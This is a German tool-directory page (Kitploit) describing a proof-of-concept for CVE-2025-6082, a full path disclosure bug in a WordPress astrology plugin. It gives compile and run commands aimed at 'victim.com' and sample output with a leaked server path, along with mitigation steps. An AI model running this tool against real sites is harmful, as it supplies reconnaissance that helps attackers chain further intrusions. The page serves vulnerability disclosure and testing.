Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6082 — Proof-of-Concept nutzt die Full Path Disclosure-Schwachstelle im WordPress-Plugin „Birth Chart Compatibility“ (<=v2.0) aus. | Kitploit
Tools/GitHubGitHub/bytereaper77/cve-2025-6082
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsArchived
GitHubbytereaper77/cve-2025-6082

CVE-2025-6082

Proof-of-Concept nutzt die Full Path Disclosure-Schwachstelle im WordPress-Plugin „Birth Chart Compatibility“ (<=v2.0) aus.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-6082 Full Path Disclosure PoC

Autor: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Schwachstelle: Full Path Disclosure (CWE-200)

Beschreibung

Dieser Proof‑of‑Concept nutzt einen Full‑Path‑Disclosure‑Fehler im Birth Chart Compatibility WordPress-Plugin (Versionen ≤ 2.0). Der POC sendet eine HTTP-GET-Anfrage an den index.php-Endpunkt des Plugins, fängt alle PHP-Warnungen oder schwerwiegenden Fehler ab und extrahiert den Dateisystempfad des Servers (z. B. /var/www/html/wp-content/plugins/... oder C:\xampp\htdocs\...).
Die Offenlegung des vollständigen Pfades hilft einem Angreifer, weitere Angriffe wie Local File Inclusion (LFI), Remote Code Execution (RCE) oder andere Aufklärungsangriffe zu verketten.

Anforderungen

  • Linux
  • gcc oder ein kompatibler C-Compiler
  • libcurl-Entwicklungsheader
  • argparse.c / argparse.h

Kompilierung

root@kitploit:~
gcc -o fpd-poc exploit.c argparse.c  -lcurl

Verwendung

./fpd-poc -u https://target.com [options]

Optionen:

Flag Beschreibung

-u, --url (Erforderlich) Basis-URL der Ziel-WordPress-Seite

-c, --cookies Cookies aus einer Datei verwenden (optional)

-v, --verbose Ausführliche curl-Ausgabe aktivieren

-f, --loop Wiederhole die Anfrage N-mal (z.B. -f 10)

-h, --help Diese Hilfemeldung anzeigen

Beispiel:

Einmalige Überprüfung

./fpd-poc -u https://victim.com

Ausführlicher Modus mit 5 Wiederholungen

./fpd-poc -u https://victim.com -v -f 5 Beispielausgabe:

[+] Request sent successfully

[+] Input Url : https://victim.com

[+] Full Format Url: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php

[+] Http Code : 200

====================================[Response]====================================

Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...

[+] Response Len : 256

[+] Keyword found: Warning:

[+] Context: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php

Abhilfe

Aktualisieren Sie das „Birth Chart Compatibility“-Plugin auf eine gepatchte Version (> 2.0), sobald diese veröffentlicht wird.

Deaktivieren oder entfernen Sie das Plugin, wenn Sie es nicht verwenden.

Verweigern Sie den direkten Zugriff auf die PHP-Dateien des Plugins (index.php) über Ihre Webserver-Konfiguration (z. B. über .htaccess- oder Nginx-Regeln).

Haftungsausschluss Dieser Code wird ausschließlich zu Bildungs- und Testzwecken bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben, kann illegal sein.

Tool herunterladen